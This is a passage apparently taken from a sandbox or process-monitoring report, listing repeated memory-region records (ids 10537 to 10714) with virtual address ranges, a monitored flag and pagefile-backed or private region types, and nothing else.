1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10537 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10538 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10539 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10540 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10541 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10542 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10543 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10544 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10545 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10546 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10547 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10548 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10549 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10550 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10551 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10552 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10553 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10554 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10555 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10556 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10557 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10558 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10559 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10560 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10561 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10562 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10563 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10564 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10565 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10566 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10567 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10568 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10569 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10570 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10571 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10572 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10573 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10574 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10575 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10576 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10577 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10578 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10579 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10580 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10581 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10582 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10583 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10584 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10585 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10586 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10587 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10588 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10589 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10590 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10591 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10592 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10593 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10594 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10595 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10596 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10597 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10598 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10599 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10600 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10601 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10602 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10603 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10604 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10605 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10606 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10607 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10608 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10609 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10610 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10611 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10612 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10613 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10614 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10615 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10616 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10617 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10618 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10619 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10620 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10621 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10622 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10623 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10624 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10625 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10626 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10627 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10628 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10629 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10630 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10631 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10632 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10633 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10634 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10635 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10636 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10637 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10638 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10639 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10640 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10641 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10642 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10643 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10644 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10645 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10646 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10647 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10648 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10649 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10650 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 10651 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 10652 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 10653 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10654 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10655 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10656 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10657 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10658 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10659 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10660 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10661 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10662 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10663 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10664 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10665 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10666 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10667 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10668 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10669 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10670 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10671 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10672 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10673 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10674 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10675 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10676 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10677 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10678 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10679 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10680 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10681 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10682 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10683 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10684 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10685 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10686 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10687 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10688 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10689 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10690 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10691 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10692 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10693 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10694 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10695 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10696 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10697 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10698 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10699 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10700 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10701 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10702 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10703 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10704 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10705 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10706 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10707 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10708 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10709 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10710 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10711 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10712 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10713 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10714 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 